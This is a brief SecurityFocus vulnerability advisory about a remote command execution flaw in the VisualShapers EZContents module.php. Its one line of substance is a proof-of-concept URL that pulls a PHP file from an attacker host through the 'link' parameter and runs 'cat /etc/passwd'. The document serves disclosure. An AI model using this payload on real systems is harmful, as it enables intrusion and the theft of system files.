VisualShapers EZContents Module.PHP Remote Command Execution Vulnerability

The following proof-of-concept has been made available by Zero_X:

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus